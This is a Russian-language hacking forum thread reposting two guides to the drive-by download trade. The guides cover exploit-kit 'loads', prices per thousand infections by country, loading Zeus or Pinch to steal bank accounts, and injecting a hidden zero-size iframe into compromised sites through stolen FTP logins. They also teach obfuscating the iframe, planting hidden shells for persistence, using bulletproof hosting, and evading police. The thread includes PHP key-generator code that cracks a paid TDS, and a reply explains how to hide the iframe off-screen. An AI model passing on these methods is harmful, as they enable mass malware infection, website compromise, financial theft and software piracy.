О сплойтах,ифреймах,загрузках.

  • Автор темы elvi
  • 50
  • Дата начала

elvi

Пользователь
Регистрация
01.01.70
Сообщения
12
Реакции
0
Баллы
11
Статья первая.
Общее О Загрузках:
Загрузка - это загрузка и запуск файла (то-ли вашего, то-ли клиента) на компе жертвы.
Загрузки можно делать с помощью Связки Эксплоитов или Ботнета.
Я буду рассматривать более часто встречающийся первый вариант.
Загрузки наверное есть самый популярный способ распространения вирусов, зачастую троянов.
Вообще начать заниматься этим делом это требует или больших усилий, или стартового капитала,
но скажу что бы никто не пугался, вполне реально начать без денег.

Загрузки в Бизнесе:
И так, многих интересует денежная сторона этого вопроса, ну что тут сказать
да, загрузки это очень прибыльное дело, особенно если знаешь что делать и как.
Самые прибыльные загрузки это загрузки юзерам следующих стран:
AU(Австралия) - 300-550$
UK(Великобритания) - 220-300$
IT(Италия) - 200-350$
NZ(Новая Зеландия) - 200-250$
ES(Испания),DE(Германия),FR(Франция) - 170-250$
US(США) - 100-150$
Цены указаны за 1000 уникальных загрузок.
Русские и Украинские загрузки ценятся гораздо меньше - (20-40$)
Так же часто продаются микс загрузки, это загрузки которые делаються из микс трафа стоимость приблизительно такая же как и на Ru, Ua

Биз Загрузки
Но это что касается если грузить клиенту файл, но вы ведь можете грузить и свой файл,
что вы можете грузить? ну например Zeus, формграберы, банковские трои (это уже относиться к кардингу) и пр.
Если вы грузите файл клиента, то понятно вы получаете деньги, но если же вы грузите файл для себя, что в таком случае?
Что мы получаем? все зависит от файла который грузим, К примеру если мы будем грузить Зевс ну или на крайней случай пинч, а может и приватный трой, мы получаем отчеты, а что в отчетах ? информация, там может быть
что угодно, от номеров icq до Банковских аккаунтов (З.Ы. В кардинг опускаться не буду), из них можно много чего извлечь,
особенно если трафик Бизнес, но для этого вам придется поднапрячься читать их, даже поиск не даст того результата что даст индивидуальное чтение всех отчетов.
Советы по извлечению инфы читайте в FAQ.

Не Биз Загрузки
В нынешнее время трудно добыть бизнес фтп, и что же тогда делать если он не биз?
Не Биз траф так же активно используеться для Сокс ботов, Ддос ботов, Спам ботов, и пр. а из этих ботов можно извлечь не малую выгоду, умея грамотно их продавать или использовать.
Так же в данный момент существуют партнерки как по загрузкам так и по трафику.
По трафику они конвертируют его в загрузки, ну а загрузки платят за 1000 инсталов
Не хочу никого обидеть, но я бы не советовал бы сливать трафик в партнерку, ибо никто не знает как оно там…
может траф разветвляется и идет на много сплойтов итп. а Загрузки же, ну лучше всегда знать что грузишь, если не волнует то можно
грузить для партнерки.

Каждый новичек (не просто в загрузках, а и в хек бизе) увидит цифры, и сразу подумает все это мое, буду загребать миллионы, но это гораааздо сложнее чем кажеться на первый взгляд.

Коротко про Эксплойты.
Нам нужно:
1)Трафик
2)Связка
3)Старание (или Деньги)
Начинать все таки надо с трафика Ибо если не будет трафика то не будет загрузок, по моему логично )
Если у вас есть 1000 уинков трафа в сутки это не значит что у вас будет 1000 загрузок в день, это в любом случае, в самом лучшем с 1000 трафа будет 500 загрузок, но на Забугорном (Забугорный значит Заграничный, типа Европа, Америка итп)
трафике будет еще меньше.
Так вот вернемся к тому с чего начинать, У нас уже есть трафик, нам еще нужна связка эксплойтов
Эксплойт это скрипт позволяющий через уязвимость в какой либо программе (зачастую Браузер) выполнить необходимое действие,
например загрузить и запустить файл. Подробнее об Эксплойте. А связка эксплоитов это "сборник" эксплоитов сшитых в один скрипт.
Впринципе Связку найти не проблемма, гораздо сложнее понять насколько она грамотна сделана, нет ли в ней вражеских скриптов
ну и какой Пробив(КПД) у нее будет (Пробив Связки = (кол-во загрузок с 1к связки/1000)*100 %) А на самом деле с 1к трафика определить пробив точно нельзя
он зависит от трафика, обычно для теста связки берут 20к трафика, а то и больше.
Итак самая пожалуй известная связка Всех времен это mpack на основе эксплоита mdac, а все остальные уже схожи, на него.
Вот пара Связок которые имеются в паблике и более менее нормальные :
Ice-pack
Fire-Pack
Ad-pack
mpack

З.Ы. есть и другие, но все же думаю выкладывать их нету смысла.
Если порыться то можно их много найти, но опасайтесь вражеских скриптов(ифреймов), зачастую они стоят или в индексе или в эксплоитах, или в инклудах ранее перечиленых страниц.
О платных связках я говорить тут не буду, ибо стоят дорого, новичкам не по зубам, но все же перечислю их это есть Ad-Pack+, связка от Nuclear, Неосплойт и другие.
Лично я использовал из паблика Айс пак, и вам его советую.
Возникает еще одна проблемка - Связки палятся, к сожалению если вы не знакомы с пхп то это вам не решить, но
есть люди которые спрячут от антивирусов связки за денюжку(только желательно с ними работать через гаранта, или предварительный показ результата) или за так.

Еще немного расскажу о Пробиве, он может быть разный, на связках типа Айс пак, пробивается практически только один ИЕ(Internet Explorer)
Обычный пробив на Ру трафе, непалящемся состовлял 33% В пробиве многое зависит от трафа
К примеру русский траф имеет больший пробив потому что многие юзают крякнутый софт, пиратки, итп, это крякнутое по делает форточки для сплойтов.
Забугорный же траф дает меньше поскольку там зачастую лицензионное ПО, но при этом оно старое, к примеру у нас любители свежатины давно сидят на ИЕ 7
но там можно встретить фирмы на которых до сих пор стоит ИЕ 5, пробив на Забугорном на Айсе был ~ 20-25% Траф может быть и Адалт (Для взрослых) который имеет пробив 5-10%
З.Ы. про настройку связки ничего не говорю ибо это много

И опять таки Хост

Для содержания связки нужен хост, да с поддержкой MySQL и PHP, да желательно абузоустойчивый, потому что если вы укоренитесь в этом деле, а потом нечайно прийдет
абуза, то все полетит к чертям. Но несмотря на это вам хватит всего лишь хоста на 50 мб, а это ~20-25 $ в месяц, хотя как по мне новичкам можно
и на бесплатном, если имеется трафик, но будьте готовы что однажды хост залочат.

Вот у вас уже есть Связка, траф и Хост,в принципе это все что нужно для Загрузок, советую пару дней просмотреть какое количество загрузок у вас будет (продают не меньше 1000 загруок) а затем уже постить.
Ниже расскажу про пару фишек.

Самотрафикация
Какое умное слово я придумал, что я под ним подразумиваю, это значит использовать загрузки, для получения большего количества трафа,
берем грузим пинч, снимаем отчеты и экспортируем Фтп затем FTP TOolZом Чекаем фтп и Фреймим их, и получаеться вы нарабатываете обороты, трафа, а соответственно и Загрузок.

Дополнительные Эксплойты
Вы всегда можете добавить к своей связке несколько дополнительных Эксплойтов, если конечно имеются знания языка php и иногда некоторых
других языков, все доступные массам эксплойты стекаются на milw0rm
Но знайте что бы добавить эксплойт нужны навыки и знание как с ними работать, добавление Эксплойтов увеличит кпд связки. Так же есть приватные 0day эксплойты которые стоят много денег)


Советы и FAQ:
Вопрос: Что можно делать если загружаю свой файл(трой\бот)?
Извлечение информации из отчетов являеться важнейшей частью, главное не пропустить что либо ценное,
Вам может попасться Админка какого нибудь Бизнесс сайта, вы сможете подменить кошелек, получить деньги,
да и в конце залить шелл и поставить фрейм, внимательно смотрите на все что можно продать, акки пайпал, еголд, Яндекс Деньги, САР сайты, партнерки. Отчеты можно продавать, другим людям, но имхо это не выгодно.
Если делаете загрузки троя сами то приготовьтесь к тому что надо будет копаться в отчетах.
Но Трой это не единственная вещь которую можно грузить, я писал выше про Сокс, ддос, спам ботов, так вот
вы можете даже организовать свой сервис по продаже соксов, или спам сервис, ну или ддос сервис, будете валить конкурентов солидных фирм.
То есть Фактически из загрузок может вытекать практически любой другой вид Заработка, так что дерзайте!

Вопрос: Кому лучше всего продавать Загрузки(Траф)?
Лучше всего конечно продавать проверенным покупателям, Которых все знают и уважают, но далеко не всегда получается с ними работать
Но на благо мудрые люди придумали такого человека как Гаранта, вы проходите проверку гарант пишет что вы прошли проверку и имеете товар,
И после этого от покупателя вы можете просить деньги вперед, так же хорошо бы перед тем как начать работать с человеком проверить
не кидала ли он, в этом поможет сайтец куда записывают всех зарегестрированых кидал kidala.info

Вопрос: Чего следует остерегаться продавая загрузки?

В первую очередь кидал.
Остерегаться так же нужно того что бы сплойт не спалился и что бы файл Клиента или ваш не палился Антивирусами потому что если спалите сплойт то админы спалят фрейм а значит минус траф уже, да и желательно всегда знать что вы грузите,
потому что есть некоторые вирусцы за распространение которых вами могут заинтересоваться Добрые дяди, ну это на крайней случай, не пугайтесь.

Совет: Лучше всего работать с Забугорным трафом, потому что наше ФСБ или СБУ не очень хочет сотрудничать с ФБР, и в том что буржуи вас на родине не тронут
ну это так если вдруг там что то серьезное.

Совет: Если вы работаете с Забугорным трафиком, то для проверки посещаемости ресурса проверяйте по alexa рангу www.alexa.com чем он меньше
тем больше там посетителей, но знайте ранг не равен количеству посетителей!

Вопрос: Какие Чекеры фтп вы еще знаете?
ну есть много чекеров. зачастую приватные, на Айс-Паке есть встроеный чекер и фреймер. Так же стоит сказать о платном чекере Мани Мэйкер тоже неплохая вещь,
Еще вот недавно тести Бетку нового чекера Antichat FTP Checker by RaZzZaR впринципе ничего, в ближайшее время должен будет выйти в паблик
но все же я советую Фтп тулз (имхо) лучший.

Вопрос: ФТП тулз не работает, и чекер на айспаке тоже что делать?
Скорее всего вы используете хостинг на котором запрещено подключение к другим фтп (типа jino-net.ru)
Или же вы неправильно, что-то настроили.

Вопрос: Где можно купить продать загрузки/траф ?
Ну насколько я знаю самый известный сайт на данный момент это traffboard.cn там можно продавать и загрузки, и траф, так же там можно посмотреть ценовую характеристику покупаемых стран не указаных в статье

Вопрос: Почему Au загрузки дороже всех?
Ну Поскольку в основном бизнесс траф идет с USA и с AU, это уже дает ценность Австралии, но к сожалению много американцев порноманьяки (достаточно посмотреть куки Американцев что бы все понять) в Австралии очень качественный биз траф, нередко использующийся для Кардинга.
качество Ау трафа мона проверить поставив его на партнерку атиспайвары.

Вопрос : Почему сразу не продавать загрузки? Там же цена выше значительно... Или в трафф уходит то, что не пробивается сплойтами?
Дело в том что загрузки делать гораздо сложнее, на 1000 загрузок может уходить до 10к трафика (в зависимости от качества), а добиться 10к в сутки что бы делать 1к загрузок весьма трудно для новичка, ну конешно если вы знаете пхп и вы сможете изменить связку, сделать ее лучше что увеличите пробив то тогда все карты вам в руки. А траф не пробитый сплойтами в продажу дают не хорошие люди(имхо)
 

elvi

Пользователь
Регистрация
01.01.70
Сообщения
12
Реакции
0
Баллы
11
Статья вторая
Общее о трафике:
Трафик В сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей
за оределённый промежуток времени (обычно за сутки). (c) Википедия
Трафик Бывает 2х типов
1)Ифрейм Трафик
2)Трафик для СЕО

Ифрейм (Iframe) трафик это трафик зачастую использующийся для хек целей,
таких как загрузки.
СЕО же трафик используеться для раскрутки ресурсов.
Подробнее о СЕО можете прочитать тут
Трафик разделяется по странам
самые востребованные это AU-Австралия US-США UK-Великобритания DE-Германия IT-Италия
Сокращения о всех странах можно найти тут Трафик Бывает Бизнес и обычный, тут думаю объяснять не надо...
Так же очень популярно сейчас продавать Микс трафик, микс трафик это трафик состоящий из
трафика который идет с различных Стран, но все же большую ценность представляет трафик Отдельных стран
(За исключением Стран Бывшего СССР, Азии итп)

Зачем нужен трафик?
Как я писал выше Iframe трафик используеся для хек целей.
В основном для Загрузок (о них я напишу позже)
Ни для кого не секрет что Загрузки и Трафик являются одним из самых популярных
способов Хек заработка, на любом сайте с разделом Купля продажа (на тему Компьютерной Безопасности)
можно увидеть посты типа "Продаю Траф","Качественные загрузки","Куплю Uk траф или загрузы"
И как можно Увидеть такие вещи стоят прилично (по крайней мере для новичков в этом деле)
Несмотря на большое количество продавцов Трафика на него всегда есть спрос.
И если вы начнете заниматься продажами трафика у вас всегда будет работа, и деньги

Как его добыть ?
Добывается трафик по разному:
1)С ломаных Сайтов
2)С белых ресурсов
3)С Доров
4)со спам рассылок
Iframe трафик добываеться лишь первым методом.
Опять же в разделах купля продажа вы можете увидить сообщения типа "Куплю Фтп","Продам Фтп","Скупаю Шеллы"
Итак вы наверное уже поняли что бы иметь трафик надо иметь фтп или шеллы
Думаю что такое FTP доступ вы знаете, а про шелл поподробнее можете прочитать тут
И так Как же нам достать Фтп или шеллы, Ну это уже зависит от вас, Самые известные способы
это снимать ftp с отчетов Пинча или покупать, а с шеллами все сложнее, это уже нужно иметь навык в SQL и PHP
инъекциях. Да но если вы это не умете, не стоит сразу вариант с шеллом оставлять до лучших времен...

Что делать с Этими FTP и Шеллами О_о
Ну теперь я поведаю вам великую тайну, что такое iframе,
IFrame - "плавающий" или встроенный фрейм. Iframe позволяет нам вставить один html(php)-документ в другой html(php)-документ.
Ну это все заумные понятия, объясню по быстрому, ифрейм в хеке это код который вписывается в страницу сайта (какую либо, зачастую в индекс)
что бы все зашедшие на сайт юзеры заходили параллельно на другой ресурс (который указан во фрейме), при этом не ведая этого ))
Вообщем объяснил как смог, без заумных слов. Пример ифрейма:
Код:
Код:
<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0" frameborder="0"></iframe>

И так разберем его по кускам
< - тег начала кода
iframe src="http://yoursite.ru/tds/index.php" - именно тут указывается куда будут заходить параллельно посетители, кавычки обязательны!
width="0" height="0" frameborder="0" - это тоже неотъемлемая часть ифрейма, означает что длина высота = 0, а фреймбордер убирает границу фрейма
Благодаря этим параметрам фрейм на странице абсолютно на заметен, как бы ты не приглядывался ))
</iframe> - Конец фрейма
Итак когда рассмотрели что такое ифрейм, разберем что же с этим чудесным кодом делать?
Допустим вы уже Добыли ФТП и теперь можете на него зайти, что бы иметь трафик нужно поставить фрейм
вы заходите на фтп (НЕЗАБЫВАЙТЕ О БЕЗОПАСНОСТИ ЮЗАЙТЕ ПРОСКСИ, СОКСЫ ИЛИ ВПН) заходите в директорию
где расположен сайт, обычно это htdocs www или папка с именем домена типа - name.ru
Зашедши в папку вы видите множество файлов, выбираете файл index или в редких случаях home, main.. файл может быть
как с php так и html расширением. открываете его и вставляете ифрейм, с названием
Код:
Код:
<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0" frameborder="0"></iframe>

где yoursite.ru это ваш файл tds/index.php это папка и файл куда будет идти трафик. Затем Сохраняете файл и вот у вас есть трафик!
Про шелл можно много рассказать, Вкратце шелл скрипт, который позволяет при наличии прав, редактировать файлы на фтп, и лазить по папкам
и еще мноооого чего другого не относящегося к этой теме. А редактирование для нас самое главное
Подробнее про шелл тут
З.Ы. чем больше посещаемость сайта тем больше трафика у вас...
Это Конечно хорошо что вы научились ставить фреймы, но это кажется напряжным, если клиент закажет менять фрейм, или ставить фрейм куда стекается траф
да и вообще так не удобно, НО у нас есть одна замечательная штука, называется она TDS (Traffic Direct System)

Что такое ТДС и с чем его едят?
ТДС - это система для управления трафиком.
Если говорить кратко, то ТДС это скрипт, в который сливается трафик из различных источников. Система распределяет полученный трафик следуя правилам установленным хозяином скрипта.
Таким образом хозяин получает полную статистику и полный контроль над всем своим трафиком из одного скрипта.
На данный момент существует много ТДС предоставлю пару бесплатных тдс
1)TDS от Kallisto
2)Advanced TDS

1я тдс имеет одну уязвимость, о том чего она касаеться и как исправить можно почитать на Вбх.
2я тдс является платной, но тут есть один небольшой ключик, качаете ее а затем в файл key.php прописываем следующее
Код:
Код:
<?php function genkey ($key) { $kx = 193; $kp = 149; $p = 0; $r = ''; $p =0; $ps = 0; while ($p<= strlen ($key) - 1) { $d = $key[$p]; $d=ord($d); $d=$d^$kx; $d = $d + $ps + $kp; $r= "000".$d.$r; ++$ps; $p++ ; } return $r; } $key=genkey($_SERVER['HTTP_HOST']);
?>
И получаем полностью рабочую ТДС )
Как пользоваться ТДС тут я писать не буду, ибо получиться очень емкая статья, на данный момент лучшей тдс является Sutra TDS

Ну вот теперь казалось все есть для того что бы продавать трафик, но кажется чего то не хватает... ах да, хоста
куда будет сливаться трафик!

Хост
Ну думаю что такое хостинг и хост знают все, я лишь дам пару советов:
1)Лучше всего делать хост похожим на какой либо счетчик
или банерообменник или еще что что бы админ подумал что так надо, потому что много админов не делали свои сайты а лишь заказывали,
потому нужно ли оно или нет они не знают.
2)Покупайте Абузоустойчивый хост, он лучше всего, почему да потому что сколько бы админы не жаловались хостеру они все равно не накроют хост.

Ну вот теперь вы можете сделать свой сервис трафика = )
но желательно прочтите советы

Советы и FAQ
Совет : Ифрейм часто палиться и админы ломаных майтов ругаются и если хост не абузоустойчивый то накрывается все дело, но
не строит расстраиваться, есть специальные программы обфускаторы (какое страшное слово) которые путают пхп код
Одной из них является TrueBug PHP Encoder
После обработки фрейма он будет выглядеть больше и более уродским, за то разгадать админы его не смогут, ну хотя
если захотеть то можно )

Вопрос : Почему когда я захожу на зафреймленый сайт то антивирус ругается?
Скорее всего потому что вы льете траф недобросовестному товарищу связка эксплойтов которого палиться

Вопрос : По счетчику на сайте 1000 посещений, а по ТДС мне сливаеться с сайта всего 100, в чем дело ?
Дело в том что если вы поставили фрейм только на индекс, то траф будет идти только с индекса, возможно на сайт
люди заходят через поиск и он выдает другую страницу не индекс, и потому трафа так мало.

Совет : Всегда бывает так что вы спалили доступ и пароль на ФТП вот вот поменяют, что в таком случае делать?
Всегда нужно оставлять запасной выход открытым (с)
Если ресурс реально того стоит что бы биться над ним, просто залейте куданибудь поглубже шелл, поставьте CHMOD 777 на него
и запишите адресс шелла в блокнотик, НО дело в том что зачастую шеллу не хватит прав что бы изменить индекс, в таком случае предварительно
вы должны изменить CHMOD индекса на 662, а лучше всего поставить еще и на Инклуды 662.

Вопрос : Вы там что то говорили про CHMOD и про Инклуды, что это?
CHMOD это разрешение различных групп пользователей делать читать и записывать что то в файл
подробнее про CHMOD можно почитать тут
Инклуд, это вызов какой либо страницы в другую, к примеру
вы читаете код странички index.php и видите
Код:
Код:
<? include ("banner.php");?>

вот тут означает что index.php берет код из страницы banner.php
то есть фактически <? include ("banner.php");?> в страничке заменяется на содержимое файла banner.php
и тем самым если вы можете поставить фрейм в баннер.пхп и он будет действовать в index.php
То есть если вы поставите фрейм в одном из инклудов, то его сложнее будет найти.

Вопрос : как запутать админа что бы он не удалил фрейм?
х3 честно говоря, но можно опять же в инклуде (желательно) или в индексе вставить Ифрейм, а затем выделить фрейм и кусочек кода сайта
вырезать и запихнуть в обфускатор, и потом обратно вставить, если Одмин удалит его то сайт запориться, и соответственно если админ Плуг
то он вставит обратно этот кусочек и будет так жить... но это только если он плуг.

Вопрос : Какие загрузки больше всего ценяться и почему?

Читай выше я писал, а почему, нуу, потому что Некоторые страны Банковские, там дофига банков и всё такое, или для других целей
и вообще какая тебе разница? продаешь так продавай).

Обе статьи взяты с antichat.ru
Емае-когда админ скин помяняет у нас-все в черных тонах читать плохо(
Так же в аттач залил пару сплойтов,качал их хз откуда,так что возможен скрытый подарок внутри.
 

student

Пользователь
Регистрация
22.06.04
Сообщения
2
Реакции
0
Баллы
16
<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0" frameborder="0"></iframe>
Ни в коем случае не ставить нулевой фрейм-очень быстро банит за такое уже давно. Лучше нормального размера, но за пределами экрана.
 

Статистика форума

Темы
200.635
Сообщения
380.523
Пользователи
327.875
Новый пользователь
fora777
Сверху Снизу